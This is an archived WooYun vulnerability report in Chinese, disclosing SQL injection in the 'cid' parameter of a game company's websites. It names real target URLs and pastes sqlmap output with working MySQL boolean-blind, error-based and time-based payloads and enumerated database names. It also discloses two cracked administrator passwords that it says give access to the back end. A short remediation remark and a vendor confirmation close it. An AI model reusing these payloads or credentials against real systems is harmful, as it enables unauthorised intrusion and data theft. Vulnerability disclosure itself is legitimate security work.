乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-15: 细节已通知厂商并且等待厂商处理中 2016-01-15: 厂商已经确认,细节仅向厂商公开 2016-01-25: 细节向核心白帽子及相关领域专家公开 2016-02-04: 细节向普通白帽子公开 2016-02-14: 细节向实习白帽子公开 2016-02-27: 细节向公众公开
不知道如何getshell 也没继续看~
只要是游戏官网可以打开/m/list.html?cid=1基本都有注入 参数cid http://xm.yingxiong.com/m/list.html?cid=1 (GET)
sqlmap identified the following injection points with a total of 73 HTTP(s) requests:---Parameter: cid (GET) Type: boolean-based blind Title: MySQL >= 5.0 boolean-based blind - Parameter replace Payload: cid=(SELECT (CASE WHEN (1182=1182) THEN 1182 ELSE 1182*(SELECT 1182 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: cid=1 AND (SELECT 6605 FROM(SELECT COUNT(*),CONCAT(0x7171627871,(SELECT (ELT(6605=6605,1))),0x7170766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: cid=1 AND (SELECT * FROM (SELECT(SLEEP(5)))DVat)---back-end DBMS: MySQL 5.0sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: cid (GET) Type: boolean-based blind Title: MySQL >= 5.0 boolean-based blind - Parameter replace Payload: cid=(SELECT (CASE WHEN (1182=1182) THEN 1182 ELSE 1182*(SELECT 1182 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: cid=1 AND (SELECT 6605 FROM(SELECT COUNT(*),CONCAT(0x7171627871,(SELECT (ELT(6605=6605,1))),0x7170766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: cid=1 AND (SELECT * FROM (SELECT(SLEEP(5)))DVat)---back-end DBMS: MySQL 5.0available databases [2]:[*] information_schema[*] xmcms
http://demo.yingxiong.com/m/list.html?cid= (GET)
sqlmap identified the following injection points with a total of 73 HTTP(s) requests:---Parameter: cid (GET) Type: error-based Title: MySQL >= 5.0 error-based - Parameter replace Payload: cid=(SELECT 2365 FROM(SELECT COUNT(*),CONCAT(0x716a707871,(SELECT (ELT(2365=2365,1))),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)---back-end DBMS: MySQL 5.0sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: cid (GET) Type: error-based Title: MySQL >= 5.0 error-based - Parameter replace Payload: cid=(SELECT 2365 FROM(SELECT COUNT(*),CONCAT(0x716a707871,(SELECT (ELT(2365=2365,1))),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)---back-end DBMS: MySQL 5.0available databases [2]:[*] gongfu[*] information_schema
我就不一一贴了最后发现管理账号都市[email protected] 密码能解开两个 !rjkXM 和 rfF4gi 使用这个两个密码基本没什么阻碍了
后台神马的还是别对外网开放。仔细检查SQL问题
危害等级:中
漏洞Rank:9
确认时间:2016-01-15 14:43
漏洞存在
暂无